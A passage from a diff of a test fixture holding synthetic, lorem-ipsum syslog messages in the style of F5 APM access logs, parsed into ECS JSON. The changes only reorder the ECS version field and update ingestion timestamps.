success ercita", "event": { - "ingested": "2021-06-09T10:31:52.608710700Z" + "ingested": "2021-12-14T14:42:51.960185431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2016/11/10 03:01:24 proiden medium mvele[5737]: 014d0044: :aco: tio", "event": { - "ingested": "2021-06-09T10:31:52.608714400Z" + "ingested": "2021-12-14T14:42:51.960185818Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2016/11/24 10:03:59 quaea very-high mvel[1188]: 01490520: :porinc: tetur: xce", "event": { - "ingested": "2021-06-09T10:31:52.608718200Z" + "ingested": "2021-12-14T14:42:51.960186213Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2016/12/08 17:06:33 aincidu very-high uaeab[5960]: 01490008: :licabo: enimadmi: Connectivity resource utaliqu assigned", "event": { - "ingested": "2021-06-09T10:31:52.608721900Z" + "ingested": "2021-12-14T14:42:51.960186595Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2016/12/23 00:09:07 cola high oremi[1485]: 01490128: :ineavol: iosa: Webtop boNemoe assigned", "event": { - "ingested": "2021-06-09T10:31:52.608725700Z" + "ingested": "2021-12-14T14:42:51.960187086Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2017/01/06 07:11:41 Nequepor medium rem[5461]: 01490538: :esseq: adminima: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608729700Z" + "ingested": "2021-12-14T14:42:51.960187475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2017/01/20 
14:14:16 ptateve very-high miurerep: 01490165: :toccaec: Access profile: fugi initialized with configuration snapshot catalog: labo", "event": { - "ingested": "2021-06-09T10:31:52.608733800Z" + "ingested": "2021-12-14T14:42:51.960187883Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2017/02/03 21:16:50 sBono high equ[4808]: 01490005: :amvo: siuta: Following rule urmagn from item dquia to ending temporin", "event": { - "ingested": "2021-06-09T10:31:52.608738300Z" + "ingested": "2021-12-14T14:42:51.960188275Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2017/02/18 04:19:24 iruredol very-high derit[5270]: 01490106: :atquo: cupi: AD module: authentication with 'strude' failed in allow: Preauthentication failed, principal name: dunt. success yCic", "event": { - "ingested": "2021-06-09T10:31:52.608744600Z" + "ingested": "2021-12-14T14:42:51.960188662Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2017/03/04 11:21:59 unte very-high ueipsa[748]: 011f0005: :cti: failure (Client side: vip=https://www5.example.com/olli/rever.html?rsp=oluptat#metco profile=ipv6-icmp pool=edolorin client_ip=10.104.110.134)", "event": { - "ingested": "2021-06-09T10:31:52.608749100Z" + "ingested": "2021-12-14T14:42:51.960189055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2017/03/18 18:24:33 ptasnula high syslog-ng[2638]: ill", "event": { - "ingested": "2021-06-09T10:31:52.608753700Z" + "ingested": "2021-12-14T14:42:51.960189449Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2017/04/02 01:27:07 caboNem medium 
laudan[7589]: 01490107: :oconse: mag: AD module: authentication with 'tob' failed: Client 'dolores2519.mail.host' not found in Kerberos database, principal name:deF itempo", "event": { - "ingested": "2021-06-09T10:31:52.608758300Z" + "ingested": "2021-12-14T14:42:51.960189841Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2017/04/16 08:29:41 meaque high mip[5899]: 01490107: :lamc: mvolupta: AD module: authentication with 'Utenima' failed: Clients credentials have been revoked, principal name: iqua@luptat2979.internal.local. unknown cididu", "event": { - "ingested": "2021-06-09T10:31:52.608762700Z" + "ingested": "2021-12-14T14:42:51.960190236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2017/04/30 15:32:16 atDuis medium nisiut: 01490166: :rumwri: Current snapshot ID: velill retrieved from session db for access profile: ore", "event": { - "ingested": "2021-06-09T10:31:52.608766800Z" + "ingested": "2021-12-14T14:42:51.960190641Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2017/05/14 22:34:50 uptat high amquisno: 0149016b: :uido: Completed snapshot creation: tla for access profile: mquiad", "event": { - "ingested": "2021-06-09T10:31:52.608771300Z" + "ingested": "2021-12-14T14:42:51.960191026Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2017/05/29 05:37:24 atur very-high ditau[4727]: 01490514: :piscivel: hend: Access encountered error: success. 
File: cepteur, Function: accept, Line: maliqu", "event": { - "ingested": "2021-06-09T10:31:52.608775600Z" + "ingested": "2021-12-14T14:42:51.960191533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2017/06/12 12:39:58 acon very-high sun[5971]: 01490501: :labori: porai: umiure", "event": { - "ingested": "2021-06-09T10:31:52.608780Z" + "ingested": "2021-12-14T14:42:51.960191930Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2017/06/26 19:42:33 eufug low uido[4318]: 01490500: :ici: snulap: New session from client IP 10.122.204.151 (ST=writte/CC=sitvo/C=ine) at VIP 10.169.101.161 Listener itessequ", "event": { - "ingested": "2021-06-09T10:31:52.608784200Z" + "ingested": "2021-12-14T14:42:51.960192316Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2017/07/11 02:45:07 udan low essequam[3682]: 01490113: :urQuis: etcon: session.server.network.protocol is onsequu", "event": { - "ingested": "2021-06-09T10:31:52.608788200Z" + "ingested": "2021-12-14T14:42:51.960192717Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2017/07/25 09:47:41 gelitse very-high arc[2412]: 01490013: :radip: upta: AD agent: Retrieving AAA server: tetura", "event": { - "ingested": "2021-06-09T10:31:52.608792200Z" + "ingested": "2021-12-14T14:42:51.960193101Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2017/08/08 16:50:15 imavenia low mquido[5899]: 01490517: :rnat: rur: success", "event": { - "ingested": "2021-06-09T10:31:52.608796800Z" + "ingested": "2021-12-14T14:42:51.960193482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2017/08/22 23:52:50 nonn high met[1580]: 01420002: : AUDIT - pid=2037 user=ptate folder=entsu module=conse status=failure cmd_data=ntut", "event": { - "ingested": "2021-06-09T10:31:52.608801Z" + "ingested": "2021-12-14T14:42:51.960193866Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2017/09/06 06:55:24 iconsequ high idunt[571]: 01490549: :siuta: atev: Assigned PPP Dynamic IPv4: 10.6.32.7 Tunnel Type: exerci inesciu Resource: quid Client IP: 10.198.70.58 - orem", "event": { - "ingested": "2021-06-09T10:31:52.608805100Z" + "ingested": "2021-12-14T14:42:51.960194258Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2017/09/20 13:57:58 reetdo medium lup[5051]: 01260009: :eos: Connection error:ipitlabo", "event": { - "ingested": "2021-06-09T10:31:52.608811400Z" + "ingested": "2021-12-14T14:42:51.960194666Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2017/10/04 21:00:32 reprehen very-high syslog-ng[6438]: imid", "event": { - "ingested": "2021-06-09T10:31:52.608815900Z" + "ingested": "2021-12-14T14:42:51.960195049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2017/10/19 04:03:07 sunt very-high aturQu[7083]: 01490128: :tDuis: iqu: Webtop oriosamn assigned", "event": { - "ingested": "2021-06-09T10:31:52.608820200Z" + "ingested": "2021-12-14T14:42:51.960195489Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2017/11/02 11:05:41 iquip very-high sedquian[4212]: 01490004: :etdolore: magnaa: 
Executed agent 'sumquiad', return value iusmodt", "event": { - "ingested": "2021-06-09T10:31:52.608824900Z" + "ingested": "2021-12-14T14:42:51.960195872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2017/11/16 18:08:15 equam low eaqueip[5207]: 01490538: :aevitaed: byCic: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608829Z" + "ingested": "2021-12-14T14:42:51.960196265Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2017/12/01 01:10:49 xerc high eturad[1760]: 01490506: :nvol: enimadmi: Received User-Agent header: mobmail android 2.1.3.3150", "event": { - "ingested": "2021-06-09T10:31:52.608833100Z" + "ingested": "2021-12-14T14:42:51.960196650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2017/12/15 08:13:24 sumdolo medium rors[1935]: 01490538: :oremque: quaU: Configuration snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608837100Z" + "ingested": "2021-12-14T14:42:51.960197042Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2017/12/29 15:15:58 ioff medium quioff: 0149016a: :iuntN: Initiating snapshot creation: ipis for access profile: itautfu", "event": { - "ingested": "2021-06-09T10:31:52.608841Z" + "ingested": "2021-12-14T14:42:51.960197437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2018/01/12 22:18:32 rchit medium roquisqu[5924]: 01490005: :iquid: evo: Following rule mcorpori from item mqu to ending pteursi", "event": { - "ingested": "2021-06-09T10:31:52.608845Z" + "ingested": "2021-12-14T14:42:51.960197949Z" 
+ }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2018/01/27 05:21:06 itessequ low fdeFinib[2580]: 01490128: :sumd: sectetur: Webtop edquian assigned", "event": { - "ingested": "2021-06-09T10:31:52.608848900Z" + "ingested": "2021-12-14T14:42:51.960198337Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2018/02/10 12:23:41 quiav low rit: 0149016a: :eumfu: Initiating snapshot creation: lors for access profile: oluptat", "event": { - "ingested": "2021-06-09T10:31:52.608852700Z" + "ingested": "2021-12-14T14:42:51.960198729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2018/02/24 19:26:15 oeiusmo very-high cusanti[5019]: 01420002: : AUDIT - pid=4996 user=rem folder=tseddoei module=teursint status=success cmd_data=remagnaa", "event": { - "ingested": "2021-06-09T10:31:52.608856500Z" + "ingested": "2021-12-14T14:42:51.960199117Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2018/03/11 02:28:49 ore low ovolupta: 0149016b: :volup: Completed snapshot creation: macc for access profile: ria", "event": { - "ingested": "2021-06-09T10:31:52.608860600Z" + "ingested": "2021-12-14T14:42:51.960199502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2018/03/25 09:31:24 uisau high irat[2943]: 01490549: :emsequi: ueporroq: Assigned PPP Dynamic IPv4: 10.142.213.80 Tunnel Type: tationu gnaaliq Resource: olore Client IP: 10.16.181.60 - ameaquei", "event": { - "ingested": "2021-06-09T10:31:52.608864400Z" + "ingested": "2021-12-14T14:42:51.960199985Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" 
] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2018/04/08 16:33:58 liq low mvolupta: syslog-ng: ", "event": { - "ingested": "2021-06-09T10:31:52.608868300Z" + "ingested": "2021-12-14T14:42:51.960200370Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2018/04/22 23:36:32 exe high illum[2625]: 01490101: :emi: reprehen: Access profile: tvol configuration has been applied. Newly active generation count is: 5959", "event": { - "ingested": "2021-06-09T10:31:52.608872100Z" + "ingested": "2021-12-14T14:42:51.960200777Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2018/05/07 06:39:06 iumt medium nulapari[1973]: 01490500: :tsunt: rnat:oremi:ectobeat: New session from client IP 10.187.64.126 (ST=uasiarch/CC=Malor/C=boriosa) at VIP 10.47.99.72 Listener upt (Reputation=oremipsu)", "event": { - "ingested": "2021-06-09T10:31:52.608875900Z" + "ingested": "2021-12-14T14:42:51.960201162Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2018/05/21 13:41:41 sint low auditd[3376]: ctobeat", "event": { - "ingested": "2021-06-09T10:31:52.608879800Z" + "ingested": "2021-12-14T14:42:51.960201555Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2018/06/04 20:44:15 lorumw high tdolo[3872]: syslog-ng: ", "event": { - "ingested": "2021-06-09T10:31:52.608883500Z" + "ingested": "2021-12-14T14:42:51.960201937Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2018/06/19 03:46:49 namaliqu medium aeca[4543]: 014d0044: :autemv: sciveli", "event": { - "ingested": "2021-06-09T10:31:52.608887300Z" + "ingested": 
"2021-12-14T14:42:51.960202325Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2018/07/03 10:49:23 piciati medium ntin[4646]: 01260009: :rcitat: Connection error:cinge", "event": { - "ingested": "2021-06-09T10:31:52.608890900Z" + "ingested": "2021-12-14T14:42:51.960202701Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2018/07/17 17:51:58 iqui low litani[3126]: 01490142: :itanimi: onoru: data", "event": { - "ingested": "2021-06-09T10:31:52.608894800Z" + "ingested": "2021-12-14T14:42:51.960203094Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2018/08/01 00:54:32 uptatem high ruredol: 01490079: :iadeseru: loremagn: Access policy 'acons' configuration has changed.Access profile 'nimadmi' configuration changes need to be applied for the new configuration", "event": { - "ingested": "2021-06-09T10:31:52.608898600Z" + "ingested": "2021-12-14T14:42:51.960203489Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2018/08/15 07:57:06 lupt very-high eavolupt: 01490167: :uipe: Current snapshot ID: ipsa updated inside session db for access profile: con", "event": { - "ingested": "2021-06-09T10:31:52.608903300Z" + "ingested": "2021-12-14T14:42:51.960203876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2018/08/29 14:59:40 nesciu low ssequ[4877]: 01490008: :emse: emqui: Connectivity resource cipitla assigned", "event": { - "ingested": "2021-06-09T10:31:52.608907100Z" + "ingested": "2021-12-14T14:42:51.960204283Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "September 2018/09/12 22:02:15 ionevo high ptate[52]: 01490102: :uira: todita: Access policy result: failure", "event": { - "ingested": "2021-06-09T10:31:52.608910900Z" + "ingested": "2021-12-14T14:42:51.960204674Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2018/09/27 05:04:49 iqu low tatis[7767]: 01490113: :reeufugi: sequines: session.server.network.protocol is minimve", "event": { - "ingested": "2021-06-09T10:31:52.608914600Z" + "ingested": "2021-12-14T14:42:51.960205061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2018/10/11 12:07:23 aborio low setquas: 014d0002: :nbyCi: runtmoll: SSOv2 Logon failed, config busBon form norumetM", "event": { - "ingested": "2021-06-09T10:31:52.608918500Z" + "ingested": "2021-12-14T14:42:51.960205453Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2018/10/25 19:09:57 billoinv high deomn[904]: 01490113: :mali: roinBCSe: session.server.network.port is 3959", "event": { - "ingested": "2021-06-09T10:31:52.608926Z" + "ingested": "2021-12-14T14:42:51.960205842Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2018/11/09 02:12:32 rch high sedd: 01490079: :atione: tvolup: Access policy 'oremeu' configuration has changed.Access profile 'lab' configuration changes need to be applied for the new configuration", "event": { - "ingested": "2021-06-09T10:31:52.608930Z" + "ingested": "2021-12-14T14:42:51.960206221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2018/11/23 09:15:06 urau medium upt[4762]: 01490538: :itaedict: eroi: Configuration 
snapshot deleted by Access.", "event": { - "ingested": "2021-06-09T10:31:52.608934100Z" + "ingested": "2021-12-14T14:42:51.960207563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2018/12/07 16:17:40 reetdo low nidol[4345]: 01490113: :writtenb: atevelit: session.server.listener.name is ugitsed", "event": { - "ingested": "2021-06-09T10:31:52.608938400Z" + "ingested": "2021-12-14T14:42:51.960208018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2018/12/21 23:20:14 uatDuisa high ano[4054]: 01490102: :uunturm: iatn: Access policy result: unknown", "event": { - "ingested": "2021-06-09T10:31:52.608942500Z" + "ingested": "2021-12-14T14:42:51.960208512Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2019/01/05 06:22:49 psum very-high exerci[3923]: 01490113: :lumqu: moen: session.oinvento", "event": { - "ingested": "2021-06-09T10:31:52.608946400Z" + "ingested": "2021-12-14T14:42:51.960208911Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 2019/01/19 13:25:23 volup very-high crond[4071]: (iconsequ) CMD (block)", "event": { - "ingested": "2021-06-09T10:31:52.608951400Z" + "ingested": "2021-12-14T14:42:51.960209306Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2019/02/02 20:27:57 archite high rem[6473]: 01490008: :emp: inBC: Connectivity resource did assigned", "event": { - "ingested": "2021-06-09T10:31:52.608955400Z" + "ingested": "2021-12-14T14:42:51.960209696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"February 2019/02/17 03:30:32 etconse medium uinesci: 0149016a: :otamr: Initiating snapshot creation: tsed for access profile: rExc", "event": { - "ingested": "2021-06-09T10:31:52.608959500Z" + "ingested": "2021-12-14T14:42:51.960210079Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2019/03/03 10:33:06 omnisis very-high uptatema[7023]: 01490501: :stiaec: Cicero: ven", "event": { - "ingested": "2021-06-09T10:31:52.608963300Z" + "ingested": "2021-12-14T14:42:51.960210475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 2019/03/17 17:35:40 cons low ine[870]: 011f0005: :amquisn: success (Client side: vip=https://example.net/equamn/scipi.txt?eiu=maliquam#gnama profile=rdp pool=squamest client_ip=10.24.113.101)", "event": { - "ingested": "2021-06-09T10:31:52.608967100Z" + "ingested": "2021-12-14T14:42:51.960210856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2019/04/01 00:38:14 uelaudan low teiru[4918]: 014d0044: :orinrep: pta", "event": { - "ingested": "2021-06-09T10:31:52.608970900Z" + "ingested": "2021-12-14T14:42:51.960211249Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2019/04/15 07:40:49 sis very-high rchite[7405]: 01490521: :rvelill: rors: Session statistics - bytes in:6092, bytes out: 1363", "event": { - "ingested": "2021-06-09T10:31:52.608974800Z" + "ingested": "2021-12-14T14:42:51.960211639Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2019/04/29 14:43:23 Nequepo high CROND[2977]: (emac) CMD (cancel)", "event": { - "ingested": "2021-06-09T10:31:52.608978600Z" + "ingested": 
"2021-12-14T14:42:51.960212032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2019/05/13 21:45:57 isci high ugiatn: 0149016b: :squa: Completed snapshot creation: deseru for access profile: aquioff", "event": { - "ingested": "2021-06-09T10:31:52.608982200Z" + "ingested": "2021-12-14T14:42:51.960212448Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 2019/05/28 04:48:31 onsequat high giatq[7733]: 01490106: :imad: tura: AD module: authentication with 'equuntur' failed: Preauthentication failed, principal name: rve. success mqua", "event": { - "ingested": "2021-06-09T10:31:52.608986Z" + "ingested": "2021-12-14T14:42:51.960212845Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2019/06/11 11:51:06 utlabore very-high exea[2867]: 01490008: :amquisn: itquii: Connectivity resource imaven assigned", "event": { - "ingested": "2021-06-09T10:31:52.608989800Z" + "ingested": "2021-12-14T14:42:51.960213231Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 2019/06/25 18:53:40 lloinve low nim[7673]: 01490511: :edquiac: psamvolu: Initializing Access profile teturad with max concurrent user sessions limit: 7783", "event": { - "ingested": "2021-06-09T10:31:52.608993400Z" + "ingested": "2021-12-14T14:42:51.960213637Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 2019/07/10 01:56:14 tatemse low vitae[72]: 01490000: :samvolu: dip", "event": { - "ingested": "2021-06-09T10:31:52.608997200Z" + "ingested": "2021-12-14T14:42:51.960214024Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "July 2019/07/24 08:58:48 Dui medium nostrude[7057]: 01490007: :ione: ecillum: Session variable 'maccu' set to ame", "event": { - "ingested": "2021-06-09T10:31:52.609001100Z" + "ingested": "2021-12-14T14:42:51.960214410Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2019/08/07 16:01:23 reprehe medium enimipsa[2698]: 01490521: :samn: quisnos: Session statistics - bytes in:2132, bytes out: 2552", "event": { - "ingested": "2021-06-09T10:31:52.609005Z" + "ingested": "2021-12-14T14:42:51.960214800Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2019/08/21 23:03:57 Nequepor low temseq[613]: 01490019: :ostrumex: suscipi: AD agent: Query: query with '(sAMAccountName=xplicabo)' successful", "event": { - "ingested": "2021-06-09T10:31:52.609008800Z" + "ingested": "2021-12-14T14:42:51.960215199Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2019/09/05 06:06:31 ameaquei very-high uelaud[1306]: 01490544: :ameiu: utei: Received client info - https://internal.example.net/lumquid/oluptat.jpg?equepor=iosamn#erspicia", "event": { - "ingested": "2021-06-09T10:31:52.609012600Z" + "ingested": "2021-12-14T14:42:51.960215584Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2019/09/19 13:09:05 psumqui high ncu: 01490079: :quaturve: ciad: Access policy 'diconseq' configuration has changed.Access profile 'utod' configuration changes need to be applied for the new configuration", "event": { - "ingested": "2021-06-09T10:31:52.609016500Z" + "ingested": "2021-12-14T14:42:51.960215988Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "October 2019/10/03 20:11:40 giatquo low dipisciv[5944]: 01490013: :atquo: umetMa: AD agent: Retrieving AAA server: ngelitse", "event": { - "ingested": "2021-06-09T10:31:52.609020200Z" + "ingested": "2021-12-14T14:42:51.960216368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2019/10/18 03:14:14 tem very-high giatnula[71]: Rule: enimadmi \u003c\u003cqui\u003e: APM_EVENT=deny | aecon | sedq ***failure***", "event": { - "ingested": "2021-06-09T10:31:52.609023900Z" + "ingested": "2021-12-14T14:42:51.960216756Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2019/11/01 10:16:48 erc low tasnu: [syslog-ng]", "event": { - "ingested": "2021-06-09T10:31:52.609027800Z" + "ingested": "2021-12-14T14:42:51.960217140Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2019/11/15 17:19:22 ationevo very-high datatno[3538]: 01490019: :siar: orisnis: AD agent: Query: query with '(sAMAccountName=texp)' successful", "event": { - "ingested": "2021-06-09T10:31:52.609031600Z" + "ingested": "2021-12-14T14:42:51.960217539Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2019/11/30 00:21:57 pidat very-high sSMTP[6673]: ptateve", "event": { - "ingested": "2021-06-09T10:31:52.609035400Z" + "ingested": "2021-12-14T14:42:51.960217941Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2019/12/14 07:24:31 olupta medium oremagn[2121]: 01490106: :itseddo: uptatev: AD module: authentication with 'oditem' failed in allow: Preauthentication failed, principal name: inimaven. 
